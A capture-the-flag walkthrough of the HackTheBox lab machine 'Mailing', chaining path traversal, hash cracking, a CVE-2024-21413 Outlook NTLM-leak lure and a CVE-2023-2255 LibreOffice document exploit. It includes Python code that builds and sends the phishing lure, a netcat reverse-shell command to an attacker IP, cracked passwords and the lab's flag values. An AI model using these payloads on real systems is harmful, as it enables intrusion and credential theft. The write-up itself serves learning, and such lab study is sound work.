HackTheBox Mailing

Writeup for HackTheBox Mailing

Machine Synopsis

Mailing is an easy Windows machine that runs hMailServer and hosts a website vulnerable to Path Traversal. This vulnerability can be exploited to access the hMailServer configuration file, revealing the Administrator password hash. Cracking this hash provides the Administrator password for the email account. We leverage CVE-2024-21413 in the Windows Mail application on the remote host to capture the NTLM hash for user maya. We can then crack this hash to obtain the password and log in as user maya via WinRM. For privilege escalation, we exploit CVE-2023-2255 in LibreOffice. (Source)

Enumeration

❯ nmap -sC -sV -A 10.10.11.14

PORT     STATE SERVICE       VERSION
25/tcp   open  smtp          hMailServer smtpd
| smtp-commands: mailing.htb, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-title: Did not follow redirect to http://mailing.htb
|_http-server-header: Microsoft-IIS/10.0
110/tcp  open  pop3          hMailServer pop3d
|_pop3-capabilities: TOP USER UIDL
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
143/tcp  open  imap          hMailServer imapd
|_imap-capabilities: ACL IMAP4 IMAP4rev1 CAPABILITY QUOTA RIGHTS=texkA0001 NAMESPACE completed IDLE OK SORT CHILDREN
445/tcp  open  microsoft-ds?
465/tcp  open  ssl/smtp      hMailServer smtpd
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Not valid before: 2024-02-27T18:24:10
|_Not valid after:  2029-10-06T18:24:10
|_ssl-date: TLS randomness does not represent time
| smtp-commands: mailing.htb, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
587/tcp  open  smtp          hMailServer smtpd
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Not valid before: 2024-02-27T18:24:10
|_Not valid after:  2029-10-06T18:24:10
| smtp-commands: mailing.htb, SIZE 20480000, STARTTLS, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
993/tcp  open  ssl/imap      hMailServer imapd
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Not valid before: 2024-02-27T18:24:10
|_Not valid after:  2029-10-06T18:24:10
|_imap-capabilities: ACL IMAP4 IMAP4rev1 CAPABILITY QUOTA RIGHTS=texkA0001 NAMESPACE completed IDLE OK SORT CHILDREN
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found

Let's add the domain to our /etc/hosts and check out the website.

1
echo -e '10.10.11.14\t\tmailing.htb' | sudo tee -a /etc/hosts

[Screenshot: the mailing.htb webpage]

At the bottom of the webpage there is a downloadable PDF with instructions for connecting to the mail server. Nothing in it stands out other than a possible user, maya@mailing.htb.

Checking the file's metadata with exiftool also revealed little beyond the author's name.

❯ exiftool instructions.pdf
ExifTool Version Number         : 13.00
File Name                       : instructions.pdf
Directory                       : .
File Size                       : 1705 kB
File Modification Date/Time     : 2025:01:11 14:33:57+08:00
File Access Date/Time           : 2025:01:11 14:33:57+08:00
File Inode Change Date/Time     : 2025:01:11 14:33:57+08:00
File Permissions                : -rw-rw-r--
File Type                       : PDF
File Type Extension             : pdf
MIME Type                       : application/pdf
PDF Version                     : 1.7
Linearized                      : No
Page Count                      : 16
Language                        : es
Tagged PDF                      : Yes
XMP Toolkit                     : 3.1-701
Producer                        : Microsoft® Word para Microsoft 365
Creator                         : Ruy Alonso Fernández
Creator Tool                    : Microsoft® Word para Microsoft 365
Create Date                     : 2024:03:11 18:46:08+01:00
Modify Date                     : 2024:03:11 18:46:08+01:00
Document ID                     : uuid:8E915C28-9456-4488-BB12-8E3445231916
Instance ID                     : uuid:8E915C28-9456-4488-BB12-8E3445231916
Author                          : Ruy Alonso Fernández

Let's fuzz for interesting endpoints.

❯ ffuf -c -u "http://mailing.htb/FUZZ" -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-files.txt
...
index.php               [Status: 200, Size: 4681, Words: 1535, Lines: 133, Duration: 12ms]
download.php            [Status: 200, Size: 31, Words: 5, Lines: 1, Duration: 13ms]
...

Exploitation

download.php is the endpoint used to download the instructions PDF.

[Screenshot: Burp intercept of the download.php request]

The file parameter turns out to be vulnerable to path traversal: the value is joined onto a path on disk without stripping ../ sequences, so it gives arbitrary file read on the web server.

❯ curl 'http://mailing.htb/download.php?file=../../windows/system32/drivers/etc/hosts'
# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
#      102.54.94.97     rhino.acme.com          # source server
#       38.25.63.10     x.acme.com              # x client host

# localhost name resolution is handled within DNS itself.
#	127.0.0.1       localhost
#	::1             localhost

127.0.0.1	mailing.htb

curl 'http://mailing.htb/download.php?file=..\\..\\windows\\system32\\drivers\\etc\\hosts' works too, since Windows accepts either path separator; a filter that only strips ../ would still be bypassed by the backslash form.

Wapiti's file module would also have flagged this vulnerability:

  ❯ wapiti -u http://mailing.htb
  ...
  [*] Launching module exec
  
  [*] Launching module file
  ---
  Received a HTTP 500 error in http://mailing.htb/download.php
  Evil request:
      GET /download.php?file=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2F HTTP/1.1
      Host: mailing.htb
  ---
  ---
  Windows local file disclosure vulnerability in http://mailing.htb/download.php via injection in the parameter file
  Evil request:
      GET /download.php?file=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2FSystem32%2Fdrivers%2Fetc%2Fservices HTTP/1.1
      Host: mailing.htb
  ---
  ...

Searching for the hMailServer config location turns up this forum post, which tells us that the settings live in hMailServer.ini under C:\Program Files (x86)\hMailServer\Bin.

❯ curl 'http://mailing.htb/download.php?file=../../Program+Files+(x86)/hMailServer/bin/hMailServer.ini'
[Directories]
ProgramFolder=C:\Program Files (x86)\hMailServer
DatabaseFolder=C:\Program Files (x86)\hMailServer\Database
DataFolder=C:\Program Files (x86)\hMailServer\Data
LogFolder=C:\Program Files (x86)\hMailServer\Logs
TempFolder=C:\Program Files (x86)\hMailServer\Temp
EventFolder=C:\Program Files (x86)\hMailServer\Events
[GUILanguages]
ValidLanguages=english,swedish
[Security]
AdministratorPassword=841bb5acfa6779ae432fd7a4e6600ba7
[Database]
Type=MSSQLCE
Username=
Password=0a9f8ad8bf896b501dde74f08efd7e4c
PasswordEncryption=1
Port=0
Server=
Database=hMailServer
Internal=1

The AdministratorPassword value 841bb5acfa6779ae432fd7a4e6600ba7 is a 32-character hex string with no salt: hMailServer stores the administrator password as a plain MD5 hash. Looking it up on CrackStation reveals the password homenetworkingadministrator.
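The traversal-and-hash step above, as an added Python example (my code, not the writeup's or hMailServer's). It builds both separator forms of the traversal payload, parses hMailServer.ini and re-checks the CrackStation result locally with hashlib instead of trusting a third-party lookup. It assumes the target name mailing.htb, the two-level ../ depth and the INI path seen above; the sample INI is copied from the curl output so the parser runs offline, and requests is only imported when fetch() is actually called.

```python
"""Added example (not from the original writeup): pull hMailServer.ini through
the download.php path traversal, parse it and sanity-check the admin hash."""
import configparser
import hashlib
import re

TARGET = "http://mailing.htb/download.php"          # from the writeup
INI_PATH = "Program Files (x86)/hMailServer/bin/hMailServer.ini"

# Offline sample input: the hMailServer.ini content returned by the curl above.
SAMPLE_INI = r"""[Directories]
ProgramFolder=C:\Program Files (x86)\hMailServer
DatabaseFolder=C:\Program Files (x86)\hMailServer\Database
DataFolder=C:\Program Files (x86)\hMailServer\Data
LogFolder=C:\Program Files (x86)\hMailServer\Logs
TempFolder=C:\Program Files (x86)\hMailServer\Temp
EventFolder=C:\Program Files (x86)\hMailServer\Events
[GUILanguages]
ValidLanguages=english,swedish
[Security]
AdministratorPassword=841bb5acfa6779ae432fd7a4e6600ba7
[Database]
Type=MSSQLCE
Username=
Password=0a9f8ad8bf896b501dde74f08efd7e4c
PasswordEncryption=1
Port=0
Server=
Database=hMailServer
Internal=1
"""


def traversal_payloads(path, depth=2):
    """Same file via both separators. IIS/PHP on Windows resolves either, so a
    filter that only strips '../' is bypassed by the backslash form."""
    forward = "../" * depth + path
    backward = "..\\" * depth + path.replace("/", "\\")
    return [forward, backward]


def fetch(path, session=None):
    """GET download.php?file=<path> and return the body (live use only)."""
    import requests  # assumption: requests is installed for live use
    s = session or requests.Session()
    r = s.get(TARGET, params={"file": path}, timeout=10)
    r.raise_for_status()
    return r.text


def parse_hmail_ini(text):
    """Return the interesting [Security]/[Database] fields of hMailServer.ini."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.optionxform = str  # keep key case, e.g. AdministratorPassword
    cp.read_string(text)
    return {
        "admin_hash": cp.get("Security", "AdministratorPassword"),
        "db_type": cp.get("Database", "Type"),
        "db_password": cp.get("Database", "Password"),
        # PasswordEncryption=1 means the DB password is encrypted, not hashed
        "db_password_encrypted": cp.get("Database", "PasswordEncryption") == "1",
    }


def hash_kind(digest):
    """32 hex chars, no salt: hMailServer's admin password is plain MD5, which
    is why CrackStation or hashcat -m 0 resolve it."""
    return "md5" if re.fullmatch(r"[0-9a-fA-F]{32}", digest) else "unknown"


def md5_matches(candidate, digest):
    """Verify a cracked candidate against the hash without any external service."""
    return hashlib.md5(candidate.encode()).hexdigest() == digest.lower()


if __name__ == "__main__":
    fields = parse_hmail_ini(SAMPLE_INI)
    print(fields)
    print(hash_kind(fields["admin_hash"]))
    # Re-check the CrackStation result locally before using the password.
    print(md5_matches("homenetworkingadministrator", fields["admin_hash"]))
    # Live use against the box:
    # for p in traversal_payloads(INI_PATH): print(parse_hmail_ini(fetch(p)))
```

The Database Password field is not a hash (PasswordEncryption=1 marks it as reversibly encrypted by hMailServer), so it is not a candidate for the same treatment; the admin hash is.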

The password does not work for a Windows logon over SMB, but it does authenticate to POP3 as administrator@mailing.htb (the mailbox is just empty): the mail server keeps its own credentials, separate from the OS accounts.

❯ nxc smb mailing.htb -u administrator -p 'homenetworkingadministrator'
SMB         10.10.11.14     445    MAILING          [*] Windows 10 / Server 2019 Build 19041 x64 (name:MAILING) (domain:MAILING) (signing:False) (SMBv1:False)
SMB         10.10.11.14     445    MAILING          [-] MAILING\administrator:homenetworkingadministrator STATUS_LOGON_FAILURE
❯ telnet 10.10.11.14 110
Trying 10.10.11.14...
Connected to 10.10.11.14.
Escape character is '^]'.
+OK POP3
USER administrator@mailing.htb  
+OK Send your password
PASS homenetworkingadministrator  
+OK Mailbox locked and ready
LIST
+OK 0 messages (0 octets)

With the administrator mailbox credential we can authenticate to SMTP and send mail to maya. Searching for a recent Outlook exploit CVE turns up CVE-2024-21413: a crafted file:// hyperlink in an email makes the recipient's Outlook client connect to an attacker-controlled SMB share, leaking their NetNTLMv2 response. We will be using this GitHub repo for our exploit.

python3 CVE-2024-21413.py --server mailing.htb --port 587 --username administrator@mailing.htb --password homenetworkingadministrator --sender administrator@mailing.htb --recipient maya@mailing.htb --url '\\10.10.14.6\share\' --subject "MAYA READ THIS EMAIL QUICK"

Responder must already be listening on tun0 when the mail is opened on the other side; it answers the SMB connection and records the NetNTLMv2 response.

sudo responder -I tun0
...
[+] Listening for events...

[SMB] NTLMv2-SSP Client   : 10.10.11.14
[SMB] NTLMv2-SSP Username : MAILING\maya
[SMB] NTLMv2-SSP Hash     : maya::MAILING:8ca5d07548835faa...
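The lure-and-capture exchange above, as an added Python example (my code, not the writeup's and not the code of the GitHub repo it uses). It builds the email that the exploit script sends: the trigger published in the MonikerLink analysis of CVE-2024-21413 is a file:// hyperlink to a UNC path with "!" appended, which Outlook resolves as a moniker instead of treating as a blocked file link, so it opens an SMB session to the attacker host that Responder then answers. Assumed values: the attacker IP 10.10.14.6, the share name "share", and the filename and suffix in the link (none of which need to exist on the attacker side). The STARTTLS-on-587 delivery matches the nmap output; sending is a separate function and is not called when the file is imported.

```python
"""Added example (not from the original writeup or the exploit repo): craft and
deliver the CVE-2024-21413 lure mail that makes Outlook authenticate to SMB."""
import smtplib
from email.message import EmailMessage

SMTP_HOST = "mailing.htb"
SMTP_PORT = 587                       # STARTTLS + AUTH LOGIN/PLAIN per nmap
SENDER = "administrator@mailing.htb"  # cracked hMailServer administrator account
RECIPIENT = "maya@mailing.htb"
ATTACKER_SHARE = "\\\\10.10.14.6\\share"  # assumption: Responder on 10.10.14.6


def moniker_link(unc_share, filename="instructions.rtf", suffix="1"):
    """Return file:///<UNC path>\\<file>!<suffix>. The trailing '!' is the
    moniker marker that bypasses Outlook's Protected View for file:// links;
    filename and suffix are arbitrary (assumed values)."""
    share = unc_share.rstrip("\\")
    return f"file:///{share}\\{filename}!{suffix}"


def build_lure(sender, recipient, subject, unc_share):
    """Multipart mail with a plain-text fallback and the HTML link Outlook
    renders; only the HTML part carries the clickable moniker."""
    link = moniker_link(unc_share)
    msg = EmailMessage()
    msg["From"] = sender
    msg["To"] = recipient
    msg["Subject"] = subject
    msg.set_content(f"Please open the attached document: {link}")
    msg.add_alternative(
        f'<html><body><p>Please review the attached document: '
        f'<a href="{link}">{link}</a></p></body></html>',
        subtype="html",
    )
    return msg


def send_lure(msg, user, password, host=SMTP_HOST, port=SMTP_PORT):
    """Deliver over STARTTLS with the cracked mailbox credential. Start
    Responder (sudo responder -I tun0) before calling this."""
    with smtplib.SMTP(host, port, timeout=15) as smtp:
        smtp.starttls()
        smtp.login(user, password)
        smtp.send_message(msg)


if __name__ == "__main__":
    lure = build_lure(SENDER, RECIPIENT, "MAYA READ THIS EMAIL QUICK", ATTACKER_SHARE)
    print(lure.as_string())
    # Live use: send_lure(lure, SENDER, "homenetworkingadministrator")
```

Whatever Responder captures is a NetNTLMv2 challenge-response for a challenge Responder chose, not maya's NT hash; it can be cracked offline (hashcat mode 5600, as below) but cannot be passed directly.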

That is maya's NetNTLMv2 response. Save it to a file and crack it with hashcat mode 5600 (NetNTLMv2); this yields the password, not an NT hash, so there is no pass-the-hash shortcut here.

❯ hashcat -m 5600 -a 0 maya.hash /usr/share/wordlists/rockyou.txt

MAYA::MAILING:8ca5d07548835faa:c8d0c9542104c0282b6794a5a0feacdc:...:m4y4ngs4ri

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)

Let's check where maya's password is valid.

❯ nxc smb mailing.htb -u maya -p m4y4ngs4ri
SMB         10.10.11.14     445    MAILING          [*] Windows 10 / Server 2019 Build 19041 x64 (name:MAILING) (domain:MAILING) (signing:False) (SMBv1:False)
SMB         10.10.11.14     445    MAILING          [+] MAILING\maya:m4y4ngs4ri

❯ nxc winrm mailing.htb -u maya -p m4y4ngs4ri
WINRM       10.10.11.14     5985   MAILING          [*] Windows 10 / Server 2019 Build 19041 (name:MAILING) (domain:MAILING)
WINRM       10.10.11.14     5985   MAILING          [+] MAILING\maya:m4y4ngs4ri (Pwn3d!)

❯ nxc smb mailing.htb -u maya -p m4y4ngs4ri --shares
SMB         10.10.11.14     445    MAILING          [*] Windows 10 / Server 2019 Build 19041 x64 (name:MAILING) (domain:MAILING) (signing:False) (SMBv1:False)
SMB         10.10.11.14     445    MAILING          [+] MAILING\maya:m4y4ngs4ri
SMB         10.10.11.14     445    MAILING          [*] Enumerated shares
SMB         10.10.11.14     445    MAILING          Share           Permissions     Remark
SMB         10.10.11.14     445    MAILING          -----           -----------     ------
SMB         10.10.11.14     445    MAILING          ADMIN$                          Admin remota
SMB         10.10.11.14     445    MAILING          C$                              Recurso predeterminado
SMB         10.10.11.14     445    MAILING          Important Documents READ,WRITE
SMB         10.10.11.14     445    MAILING          IPC$            READ            IPC remota

The WinRM check reports Pwn3d!, so maya can log on remotely; we get a shell with evil-winrm.

❯ evil-winrm -i mailing.htb -u maya -p m4y4ngs4ri

Evil-WinRM shell v3.7
...
*Evil-WinRM* PS C:\Users\maya\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\maya\Desktop> type user.txt
b33ed429f0862d0a479554b0af92d768

Privilege Escalation

Enumerate the host as maya. Note the localadmin profile next to maya's.

*Evil-WinRM* PS C:\Users> ls

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         2/28/2024   8:50 PM                .NET v2.0
d-----         2/28/2024   8:50 PM                .NET v2.0 Classic
d-----         2/28/2024   8:50 PM                .NET v4.5
d-----         2/28/2024   8:50 PM                .NET v4.5 Classic
d-----         2/28/2024   8:50 PM                Classic .NET AppPool
d-----          3/9/2024   1:52 PM                DefaultAppPool
d-----          3/4/2024   8:32 PM                localadmin
d-----         2/28/2024   7:34 PM                maya
d-r---         3/10/2024   4:56 PM                Public
*Evil-WinRM* PS C:\Users> cd C:\
*Evil-WinRM* PS C:\> ls

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         4/10/2024   5:32 PM                Important Documents
d-----         2/28/2024   8:49 PM                inetpub
d-----         12/7/2019  10:14 AM                PerfLogs
d-----          3/9/2024   1:47 PM                PHP
d-r---         3/13/2024   4:49 PM                Program Files
d-r---         3/14/2024   3:24 PM                Program Files (x86)
d-r---          3/3/2024   4:19 PM                Users
d-----         4/29/2024   6:58 PM                Windows
d-----         4/12/2024   5:54 AM                wwwroot

*Evil-WinRM* PS C:\> cd 'Important Documents'
*Evil-WinRM* PS C:\Important Documents> ls
<nothing>
*Evil-WinRM* PS C:\Important Documents> cd C:\'Program Files'
*Evil-WinRM* PS C:\Program Files> ls

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         2/27/2024   5:30 PM                Common Files
d-----          3/3/2024   4:40 PM                dotnet
d-----          3/3/2024   4:32 PM                Git
d-----         4/29/2024   6:54 PM                Internet Explorer
d-----          3/4/2024   6:57 PM                LibreOffice
d-----          3/3/2024   4:06 PM                Microsoft Update Health Tools
d-----         12/7/2019  10:14 AM                ModifiableWindowsApps
d-----         2/27/2024   4:58 PM                MSBuild
d-----         2/27/2024   5:30 PM                OpenSSL-Win64
d-----         3/13/2024   4:49 PM                PackageManagement
d-----         2/27/2024   4:58 PM                Reference Assemblies
d-----         3/13/2024   4:48 PM                RUXIM
d-----         2/27/2024   4:32 PM                VMware
d-----          3/3/2024   5:13 PM                Windows Defender
d-----         4/29/2024   6:54 PM                Windows Defender Advanced Threat Protection
d-----          3/3/2024   5:13 PM                Windows Mail
d-----          3/3/2024   5:13 PM                Windows Media Player
d-----         4/29/2024   6:54 PM                Windows Multimedia Platform
d-----         2/27/2024   4:26 PM                Windows NT
d-----          3/3/2024   5:13 PM                Windows Photo Viewer
d-----         4/29/2024   6:54 PM                Windows Portable Devices
d-----         12/7/2019  10:31 AM                Windows Security
d-----         3/13/2024   4:49 PM                WindowsPowerShell

LibreOffice is an unusual thing to find on a mail server and, given the writable Important Documents share, worth checking for a version with a known document-based exploit. Let's find the version number.

*Evil-WinRM* PS C:\Program Files> cd LibreOffice
*Evil-WinRM* PS C:\Program Files\LibreOffice> ls

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----          3/4/2024   6:57 PM                help
d-----          3/4/2024   6:57 PM                presets
d-----         3/14/2024   4:01 PM                program
d-----          3/4/2024   6:57 PM                readmes
d-----          3/4/2024   6:57 PM                share
-a----         6/10/2022   4:14 PM        1807470 CREDITS.fodt
-a----          7/7/2022   1:05 PM         574491 LICENSE.html
-a----          7/7/2022   1:09 PM         503055 license.txt
-a----          7/6/2022  11:40 PM           3706 NOTICE


*Evil-WinRM* PS C:\Program Files\LibreOffice> cd program
*Evil-WinRM* PS C:\Program Files\LibreOffice\program> ls
...
version.ini
...
*Evil-WinRM* PS C:\Program Files\LibreOffice\program> type version.ini
...
MsiProductVersion=7.4.0.1
...

*Evil-WinRM* PS C:\Program Files\LibreOffice\program> cd ..
*Evil-WinRM* PS C:\Program Files\LibreOffice> cd readmes
*Evil-WinRM* PS C:\Program Files\LibreOffice\readmes> ls

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----          7/7/2022   5:57 PM          16144 readme_en-GB.txt
-a----          7/7/2022   5:57 PM          16146 readme_en-US.txt
-a----          7/7/2022   5:57 PM          16150 readme_en-ZA.txt
-a----          7/7/2022   5:57 PM          17545 readme_es.txt


*Evil-WinRM* PS C:\Program Files\LibreOffice\readmes> type readme_en-GB.txt
...
LibreOffice 7.4 ReadMe
...

Searching for LibreOffice 7.4 privilege escalation vulnerabilities turns up this Snyk page for CVE-2023-2255, which allows a crafted document to run an arbitrary command when it is opened, without prompting the user; the installed 7.4.0.1 build is affected.

We can get the exploit from this GitHub repo.

❯ python3 CVE-2023-2255.py --cmd 'net localgroup Administradores maya /add' --output exploit_admin.odt
File exploit_admin.odt has been created !

❯ smbclient '//10.10.11.14/Important Documents' --user maya --password m4y4ngs4ri
Try "help" to get a list of possible commands.
smb: \> put exploit_admin.odt 

Note: a process on the host opens any file dropped into Important Documents and deletes it shortly afterwards; that is the trigger we rely on. The command embedded in the document runs with that process's privileges, which is why it can add maya to the local Administrators group (Administradores, since this is a Spanish-language Windows install; the localised name must be used).

Group membership is stamped into the access token at logon, so the existing session does not see the change. Exit the old evil-winrm shell and start a new one as maya.

❯ evil-winrm -i mailing.htb -u maya -p m4y4ngs4ri
...
*Evil-WinRM* PS C:\Users\maya\Documents> net user maya
User name                    maya
Full Name
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            2024-04-12 3:16:20 AM
Password expires             Never
Password changeable          2024-04-12 3:16:20 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   2025-01-11 11:30:27 AM

Logon hours allowed          All

Local Group Memberships      *Administradores      *Remote Management Use
                             *Usuarios             *Usuarios de escritori
Global Group memberships     *Ninguno
The command completed successfully.

*Evil-WinRM* PS C:\Users\maya\Documents> type C:\Users\localadmin\Desktop\root.txt
6de3198de3342e00c586d5d98a7feedd

Alternatively, instead of changing group membership, we can transfer nc64.exe over and get a reverse shell.

  • Create the exploit.odt file.
  ❯ python3 CVE-2023-2255.py --cmd 'cmd.exe /c C:\ProgramData\nc64.exe -e cmd.exe 10.10.14.6 443' --output exploit.odt
  File exploit.odt has been created !
  • Upload nc64.exe and exploit.odt to the share.
  smb: \> put nc64.exe 
  smb: \> put exploit.odt
  • Important: copy nc64.exe to C:\ProgramData before the document is picked up, because files in Important Documents are deleted once they have been opened; the payload must point at a copy that survives (upload nc64.exe and copy it first, then upload exploit.odt).
  *Evil-WinRM* PS C:\ProgramData> copy "\Important Documents\nc64.exe" nc64.exe
  • Wait for the reverse shell connection. The prompt lands in C:\Program Files\LibreOffice\program, confirming the command ran from the LibreOffice process that opened the document.
  ❯ nc -nlvp 443
  listening on [any] 443 ...
  connect to [10.10.14.6] from (UNKNOWN) [10.10.11.14] 64186
  Microsoft Windows [Version 10.0.19045.4355]
  (c) Microsoft Corporation. All rights reserved.
  
  C:\Program Files\LibreOffice\program>

This post is licensed under CC BY 4.0 by the author.